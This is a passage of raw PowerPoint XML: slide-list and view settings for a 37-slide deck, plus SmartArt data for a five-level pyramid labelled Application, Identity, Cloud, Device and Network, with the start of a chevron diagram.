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918" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId39"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId40"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="2147480512" r:id="rId2"/>
    <p:sldId id="2147480603" r:id="rId3"/>
    <p:sldId id="2146847211" r:id="rId4"/>
    <p:sldId id="2147480604" r:id="rId5"/>
    <p:sldId id="2147480572" r:id="rId6"/>
    <p:sldId id="2147480573" r:id="rId7"/>
    <p:sldId id="2147480574" r:id="rId8"/>
    <p:sldId id="2147480575" r:id="rId9"/>
    <p:sldId id="2147480578" r:id="rId10"/>
    <p:sldId id="2147480582" r:id="rId11"/>
    <p:sldId id="2147480579" r:id="rId12"/>
    <p:sldId id="1360" r:id="rId13"/>
    <p:sldId id="2147480580" r:id="rId14"/>
    <p:sldId id="1351" r:id="rId15"/>
    <p:sldId id="2147480583" r:id="rId16"/>
    <p:sldId id="2146846898" r:id="rId17"/>
    <p:sldId id="2147480590" r:id="rId18"/>
    <p:sldId id="503" r:id="rId19"/>
    <p:sldId id="2147480562" r:id="rId20"/>
    <p:sldId id="506" r:id="rId21"/>
    <p:sldId id="508" r:id="rId22"/>
    <p:sldId id="2147480602" r:id="rId23"/>
    <p:sldId id="2147480584" r:id="rId24"/>
    <p:sldId id="2147480589" r:id="rId25"/>
    <p:sldId id="2147480595" r:id="rId26"/>
    <p:sldId id="2147480597" r:id="rId27"/>
    <p:sldId id="261" r:id="rId28"/>
    <p:sldId id="442" r:id="rId29"/>
    <p:sldId id="2147480601" r:id="rId30"/>
    <p:sldId id="426" r:id="rId31"/>
    <p:sldId id="425" r:id="rId32"/>
    <p:sldId id="430" r:id="rId33"/>
    <p:sldId id="432" r:id="rId34"/>
    <p:sldId id="2147480593" r:id="rId35"/>
    <p:sldId id="2147480594" r:id="rId36"/>
    <p:sldId id="2147480598" r:id="rId37"/>
    <p:sldId id="2147480550" r:id="rId38"/>
  </p:sldIdLst>
  <p:sldSz cx="12436475" cy="6994525"/>
  <p:notesSz cx="7102475" cy="93884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E1C8FB21-FF75-44A0-8090-B2FB240B014B}">
          <p14:sldIdLst>
            <p14:sldId id="2147480512"/>
            <p14:sldId id="2147480603"/>
            <p14:sldId id="2146847211"/>
            <p14:sldId id="2147480604"/>
            <p14:sldId id="2147480572"/>
            <p14:sldId id="2147480573"/>
            <p14:sldId id="2147480574"/>
            <p14:sldId id="2147480575"/>
            <p14:sldId id="2147480578"/>
            <p14:sldId id="2147480582"/>
            <p14:sldId id="2147480579"/>
            <p14:sldId id="1360"/>
            <p14:sldId id="2147480580"/>
            <p14:sldId id="1351"/>
            <p14:sldId id="2147480583"/>
            <p14:sldId id="2146846898"/>
            <p14:sldId id="2147480590"/>
            <p14:sldId id="503"/>
            <p14:sldId id="2147480562"/>
            <p14:sldId id="506"/>
            <p14:sldId id="508"/>
            <p14:sldId id="2147480602"/>
            <p14:sldId id="2147480584"/>
            <p14:sldId id="2147480589"/>
            <p14:sldId id="2147480595"/>
            <p14:sldId id="2147480597"/>
            <p14:sldId id="261"/>
            <p14:sldId id="442"/>
            <p14:sldId id="2147480601"/>
            <p14:sldId id="426"/>
            <p14:sldId id="425"/>
            <p14:sldId id="430"/>
            <p14:sldId id="432"/>
            <p14:sldId id="2147480593"/>
            <p14:sldId id="2147480594"/>
            <p14:sldId id="2147480598"/>
            <p14:sldId id="21474805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D2F"/>
    <a:srgbClr val="17253D"/>
    <a:srgbClr val="1D3146"/>
    <a:srgbClr val="212121"/>
    <a:srgbClr val="838383"/>
    <a:srgbClr val="2E2E2F"/>
    <a:srgbClr val="151D2A"/>
    <a:srgbClr val="122B47"/>
    <a:srgbClr val="111A2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67" autoAdjust="0"/>
    <p:restoredTop sz="82504" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="129" d="100"/>
          <a:sy n="129" d="100"/>
        </p:scale>
        <p:origin x="3546" y="132"/>
      </p:cViewPr>
      <p:guideLst/>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="33" d="100"/>
        <a:sy n="33" d="100"/>
      </p:scale>
      <p:origin x="0" y="-8069"/>
    </p:cViewPr>
  </p:outlineViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="1" d="1"/>
        <a:sy n="1" d="1"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:notesTextViewPr>
  <p:sorterViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="100" d="100"/>
        <a:sy n="100" d="100"/>
      </p:scale>
      <p:origin x="0" y="-8276"/>
    </p:cViewPr>
  </p:sorterViewPr>
  <p:notesViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr>
        <p:scale>
          <a:sx n="1" d="2"/>
          <a:sy n="1" d="2"/>
        </p:scale>
        <p:origin x="3125" y="576"/>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9C3CE-D51D-420F-BE7A-7BA44B4A3648}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/pyramid1" loCatId="pyramid" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple1" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/colorful5" csCatId="colorful" phldr="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1AE50665-B3C4-4127-B7D6-03F15581EEEF}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Application</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A5783980-FCE2-4A41-9282-85992B294B70}" type="parTrans" cxnId="{25B5C79E-53D3-4E47-B1E3-DB172D8CE456}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3504D8C4-89D1-4FA6-877E-90CF6EDF06C3}" type="sibTrans" cxnId="{25B5C79E-53D3-4E47-B1E3-DB172D8CE456}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CE267C07-E82F-406C-A87F-F8C09D2A1044}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Identity</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5C15BF81-C425-448B-9B63-69A3A9CD396C}" type="parTrans" cxnId="{69B37903-6E05-4229-B9EE-65A67BD10BDF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2DA351AC-16F1-4EBC-8E43-DDAE7CE2BC0C}" type="sibTrans" cxnId="{69B37903-6E05-4229-B9EE-65A67BD10BDF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0F7AE107-CB7B-4CFC-BE65-1051FABFC49B}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Cloud</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A559BE54-D2DF-4ED1-8568-E0F7BF519D3D}" type="parTrans" cxnId="{DAE533A2-06EC-427C-A3FD-088231837389}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{63BBDC60-A5AA-45ED-B042-D8D88A96AFAB}" type="sibTrans" cxnId="{DAE533A2-06EC-427C-A3FD-088231837389}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2AA80E82-2F03-48B4-828D-9C4DD359E95D}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Device</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4A9AC2C6-F97D-4CAE-B591-C4B61BE849EB}" type="parTrans" cxnId="{03AA8B2A-AE7C-4E2B-AA05-0C5F1ACA3C77}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5C6BFBD4-4E47-4FAE-877B-6800D867B29B}" type="sibTrans" cxnId="{03AA8B2A-AE7C-4E2B-AA05-0C5F1ACA3C77}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CD110156-3580-4E34-8E3A-FC6EE3463046}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Network</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{03CFAF9E-329B-4CE3-B2D3-23C63EAB44AE}" type="parTrans" cxnId="{0283D296-8466-4488-B4C6-C140FEA879F0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{23ABB7F4-3409-406F-BA6F-183353367DB2}" type="sibTrans" cxnId="{0283D296-8466-4488-B4C6-C140FEA879F0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D1AB9CDC-324D-4EE3-B1F0-085430AE4A6A}" type="pres">
      <dgm:prSet presAssocID="{1539C3CE-D51D-420F-BE7A-7BA44B4A3648}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F3351BAA-9F47-4C58-A10C-6C67CA5D508E}" type="pres">
      <dgm:prSet presAssocID="{0F7AE107-CB7B-4CFC-BE65-1051FABFC49B}" presName="Name8" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A31EAE59-E5CD-4AB5-835A-4DA0E04DD3BE}" type="pres">
      <dgm:prSet presAssocID="{0F7AE107-CB7B-4CFC-BE65-1051FABFC49B}" presName="level" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{98A21F9F-4130-4CF2-90EB-BAEE8F46BF2C}" type="pres">
      <dgm:prSet presAssocID="{0F7AE107-CB7B-4CFC-BE65-1051FABFC49B}" presName="levelTx" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B5371DF7-10AE-4A0E-BA0B-0D2DA92A81B5}" type="pres">
      <dgm:prSet presAssocID="{CD110156-3580-4E34-8E3A-FC6EE3463046}" presName="Name8" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{157F157C-A849-4602-8EAA-AD9B8C7869E7}" type="pres">
      <dgm:prSet presAssocID="{CD110156-3580-4E34-8E3A-FC6EE3463046}" presName="level" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{56D8B074-1D5B-47E7-8C76-47DA41568824}" type="pres">
      <dgm:prSet presAssocID="{CD110156-3580-4E34-8E3A-FC6EE3463046}" presName="levelTx" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{837D72BE-5D54-4B76-B96F-81E8B129E2BA}" type="pres">
      <dgm:prSet presAssocID="{CE267C07-E82F-406C-A87F-F8C09D2A1044}" presName="Name8" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{069A4CCB-0042-449E-93DF-C616384F7430}" type="pres">
      <dgm:prSet presAssocID="{CE267C07-E82F-406C-A87F-F8C09D2A1044}" presName="level" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5E2D77D0-ED87-454D-8A53-1B0C3BB6ABD1}" type="pres">
      <dgm:prSet presAssocID="{CE267C07-E82F-406C-A87F-F8C09D2A1044}" presName="levelTx" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6B381187-62C4-4C79-B24B-863940A71055}" type="pres">
      <dgm:prSet presAssocID="{1AE50665-B3C4-4127-B7D6-03F15581EEEF}" presName="Name8" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0BFBAE14-3039-40F4-83DD-3723C4812F57}" type="pres">
      <dgm:prSet presAssocID="{1AE50665-B3C4-4127-B7D6-03F15581EEEF}" presName="level" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0615F940-8D0F-41EB-A7F3-2AF21215D698}" type="pres">
      <dgm:prSet presAssocID="{1AE50665-B3C4-4127-B7D6-03F15581EEEF}" presName="levelTx" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{24BE5A24-4037-42CC-BE2D-DC3EB0D846E0}" type="pres">
      <dgm:prSet presAssocID="{2AA80E82-2F03-48B4-828D-9C4DD359E95D}" presName="Name8" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3F00AB0B-DA30-4443-A403-0B1A85A14553}" type="pres">
      <dgm:prSet presAssocID="{2AA80E82-2F03-48B4-828D-9C4DD359E95D}" presName="level" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CF9928C9-C17D-48D0-AFD0-2EE7D1FD2C00}" type="pres">
      <dgm:prSet presAssocID="{2AA80E82-2F03-48B4-828D-9C4DD359E95D}" presName="levelTx" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{69B37903-6E05-4229-B9EE-65A67BD10BDF}" srcId="{1539C3CE-D51D-420F-BE7A-7BA44B4A3648}" destId="{CE267C07-E82F-406C-A87F-F8C09D2A1044}" srcOrd="2" destOrd="0" parTransId="{5C15BF81-C425-448B-9B63-69A3A9CD396C}" sibTransId="{2DA351AC-16F1-4EBC-8E43-DDAE7CE2BC0C}"/>
    <dgm:cxn modelId="{D6C17708-70B7-4EC7-AED9-F6737CB9A226}" type="presOf" srcId="{1AE50665-B3C4-4127-B7D6-03F15581EEEF}" destId="{0BFBAE14-3039-40F4-83DD-3723C4812F57}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pyramid1"/>
    <dgm:cxn modelId="{03AA8B2A-AE7C-4E2B-AA05-0C5F1ACA3C77}" srcId="{1539C3CE-D51D-420F-BE7A-7BA44B4A3648}" destId="{2AA80E82-2F03-48B4-828D-9C4DD359E95D}" srcOrd="4" destOrd="0" parTransId="{4A9AC2C6-F97D-4CAE-B591-C4B61BE849EB}" sibTransId="{5C6BFBD4-4E47-4FAE-877B-6800D867B29B}"/>
    <dgm:cxn modelId="{F7D8044A-4F99-4A49-9A09-AC15DC2AAA47}" type="presOf" srcId="{2AA80E82-2F03-48B4-828D-9C4DD359E95D}" destId="{CF9928C9-C17D-48D0-AFD0-2EE7D1FD2C00}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pyramid1"/>
    <dgm:cxn modelId="{BE803282-3DC9-4DE2-8DB3-1792F82CB8BF}" type="presOf" srcId="{CE267C07-E82F-406C-A87F-F8C09D2A1044}" destId="{5E2D77D0-ED87-454D-8A53-1B0C3BB6ABD1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pyramid1"/>
    <dgm:cxn modelId="{0283D296-8466-4488-B4C6-C140FEA879F0}" srcId="{1539C3CE-D51D-420F-BE7A-7BA44B4A3648}" destId="{CD110156-3580-4E34-8E3A-FC6EE3463046}" srcOrd="1" destOrd="0" parTransId="{03CFAF9E-329B-4CE3-B2D3-23C63EAB44AE}" sibTransId="{23ABB7F4-3409-406F-BA6F-183353367DB2}"/>
    <dgm:cxn modelId="{25B5C79E-53D3-4E47-B1E3-DB172D8CE456}" srcId="{1539C3CE-D51D-420F-BE7A-7BA44B4A3648}" destId="{1AE50665-B3C4-4127-B7D6-03F15581EEEF}" srcOrd="3" destOrd="0" parTransId="{A5783980-FCE2-4A41-9282-85992B294B70}" sibTransId="{3504D8C4-89D1-4FA6-877E-90CF6EDF06C3}"/>
    <dgm:cxn modelId="{DAE533A2-06EC-427C-A3FD-088231837389}" srcId="{1539C3CE-D51D-420F-BE7A-7BA44B4A3648}" destId="{0F7AE107-CB7B-4CFC-BE65-1051FABFC49B}" srcOrd="0" destOrd="0" parTransId="{A559BE54-D2DF-4ED1-8568-E0F7BF519D3D}" sibTransId="{63BBDC60-A5AA-45ED-B042-D8D88A96AFAB}"/>
    <dgm:cxn modelId="{96B361AE-D0FB-45C3-9A56-D9232C7B2757}" type="presOf" srcId="{CE267C07-E82F-406C-A87F-F8C09D2A1044}" destId="{069A4CCB-0042-449E-93DF-C616384F7430}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pyramid1"/>
    <dgm:cxn modelId="{C3722FB8-CF11-4C03-96BF-176CCDB87081}" type="presOf" srcId="{1539C3CE-D51D-420F-BE7A-7BA44B4A3648}" destId="{D1AB9CDC-324D-4EE3-B1F0-085430AE4A6A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pyramid1"/>
    <dgm:cxn modelId="{128577BE-1019-437E-9C4B-6B78332B9D8A}" type="presOf" srcId="{0F7AE107-CB7B-4CFC-BE65-1051FABFC49B}" destId="{98A21F9F-4130-4CF2-90EB-BAEE8F46BF2C}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pyramid1"/>
    <dgm:cxn modelId="{B97F0CCB-0E77-42CD-A749-5734C139A8BD}" type="presOf" srcId="{0F7AE107-CB7B-4CFC-BE65-1051FABFC49B}" destId="{A31EAE59-E5CD-4AB5-835A-4DA0E04DD3BE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pyramid1"/>
    <dgm:cxn modelId="{D9B1C5D9-D59E-4339-988D-7AACDB8134A5}" type="presOf" srcId="{CD110156-3580-4E34-8E3A-FC6EE3463046}" destId="{56D8B074-1D5B-47E7-8C76-47DA41568824}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pyramid1"/>
    <dgm:cxn modelId="{AEB9F0DE-EB98-4918-BE2F-27DA3B4DB589}" type="presOf" srcId="{2AA80E82-2F03-48B4-828D-9C4DD359E95D}" destId="{3F00AB0B-DA30-4443-A403-0B1A85A14553}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pyramid1"/>
    <dgm:cxn modelId="{B70800F8-8141-435A-828F-7A30BA6D4669}" type="presOf" srcId="{CD110156-3580-4E34-8E3A-FC6EE3463046}" destId="{157F157C-A849-4602-8EAA-AD9B8C7869E7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pyramid1"/>
    <dgm:cxn modelId="{F29F65F9-34EC-4475-9514-BFE89403B14B}" type="presOf" srcId="{1AE50665-B3C4-4127-B7D6-03F15581EEEF}" destId="{0615F940-8D0F-41EB-A7F3-2AF21215D698}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pyramid1"/>
    <dgm:cxn modelId="{A1695451-BC81-47D2-8869-B42485381122}" type="presParOf" srcId="{D1AB9CDC-324D-4EE3-B1F0-085430AE4A6A}" destId="{F3351BAA-9F47-4C58-A10C-6C67CA5D508E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pyramid1"/>
    <dgm:cxn modelId="{17A43EB7-8306-4EBE-8253-34AB2D26E720}" type="presParOf" srcId="{F3351BAA-9F47-4C58-A10C-6C67CA5D508E}" destId="{A31EAE59-E5CD-4AB5-835A-4DA0E04DD3BE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pyramid1"/>
    <dgm:cxn modelId="{75685B5A-C97D-47FF-8EBE-E278098E5773}" type="presParOf" srcId="{F3351BAA-9F47-4C58-A10C-6C67CA5D508E}" destId="{98A21F9F-4130-4CF2-90EB-BAEE8F46BF2C}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pyramid1"/>
    <dgm:cxn modelId="{4BA3FA1C-FD5A-499C-BFF5-6F638B9B68B2}" type="presParOf" srcId="{D1AB9CDC-324D-4EE3-B1F0-085430AE4A6A}" destId="{B5371DF7-10AE-4A0E-BA0B-0D2DA92A81B5}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pyramid1"/>
    <dgm:cxn modelId="{4C0FBC66-4FBB-45B2-B765-1AE89B8C2314}" type="presParOf" srcId="{B5371DF7-10AE-4A0E-BA0B-0D2DA92A81B5}" destId="{157F157C-A849-4602-8EAA-AD9B8C7869E7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pyramid1"/>
    <dgm:cxn modelId="{D4016513-C1DD-4527-934A-5CA1EEB46E19}" type="presParOf" srcId="{B5371DF7-10AE-4A0E-BA0B-0D2DA92A81B5}" destId="{56D8B074-1D5B-47E7-8C76-47DA41568824}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pyramid1"/>
    <dgm:cxn modelId="{5C4FFFA1-B989-4200-8352-382214101E70}" type="presParOf" srcId="{D1AB9CDC-324D-4EE3-B1F0-085430AE4A6A}" destId="{837D72BE-5D54-4B76-B96F-81E8B129E2BA}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pyramid1"/>
    <dgm:cxn modelId="{A98D7E60-0EA2-4731-B045-326F8558C3C9}" type="presParOf" srcId="{837D72BE-5D54-4B76-B96F-81E8B129E2BA}" destId="{069A4CCB-0042-449E-93DF-C616384F7430}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pyramid1"/>
    <dgm:cxn modelId="{CDE38A5E-F4C6-4C92-A1ED-8085D0E212E8}" type="presParOf" srcId="{837D72BE-5D54-4B76-B96F-81E8B129E2BA}" destId="{5E2D77D0-ED87-454D-8A53-1B0C3BB6ABD1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pyramid1"/>
    <dgm:cxn modelId="{CFC8BE94-CF0F-411E-BB9F-619BE266F81F}" type="presParOf" srcId="{D1AB9CDC-324D-4EE3-B1F0-085430AE4A6A}" destId="{6B381187-62C4-4C79-B24B-863940A71055}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pyramid1"/>
    <dgm:cxn modelId="{AAB1A593-9157-477C-B48F-1F3BF7476A79}" type="presParOf" srcId="{6B381187-62C4-4C79-B24B-863940A71055}" destId="{0BFBAE14-3039-40F4-83DD-3723C4812F57}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pyramid1"/>
    <dgm:cxn modelId="{DE6CF389-BB9C-4AAF-9488-B1D8BF68EB37}" type="presParOf" srcId="{6B381187-62C4-4C79-B24B-863940A71055}" destId="{0615F940-8D0F-41EB-A7F3-2AF21215D698}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pyramid1"/>
    <dgm:cxn modelId="{9E378836-A377-4326-9B35-912B62945328}" type="presParOf" srcId="{D1AB9CDC-324D-4EE3-B1F0-085430AE4A6A}" destId="{24BE5A24-4037-42CC-BE2D-DC3EB0D846E0}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pyramid1"/>
    <dgm:cxn modelId="{EDD54105-0B74-4547-87A8-FD05E00D6AFE}" type="presParOf" srcId="{24BE5A24-4037-42CC-BE2D-DC3EB0D846E0}" destId="{3F00AB0B-DA30-4443-A403-0B1A85A14553}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pyramid1"/>
    <dgm:cxn modelId="{873DC360-5DC5-43D0-83BA-5CE7DD0479E5}" type="presParOf" srcId="{24BE5A24-4037-42CC-BE2D-DC3EB0D846E0}" destId="{CF9928C9-C17D-48D0-AFD0-2EE7D1FD2C00}"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8C284D-CA17-4E5D-8B69-F0C979D5F9F6}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1" loCatId="process" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple1" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent1_2" csCatId="accent1" phldr="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1B6C08AF-645B-4908-939B-1FFC3B5DB782}">
      <dgm:prSet phldrT="[Text]" custT="1">
        <dgm:style>
          <a:lnRef idx="2">
            <a:schemeClr val="dk1">
              <a:shade val="50000"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </dgm:style>
      </dgm:prSet>
      <dgm:spPr>
        <a:xfrm>
          <a:off x="0" y="250315"/>
          <a:ext cx="1848397" cy="739358"/>
        </a:xfrm>
        <a:prstGeom prst="chevron">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
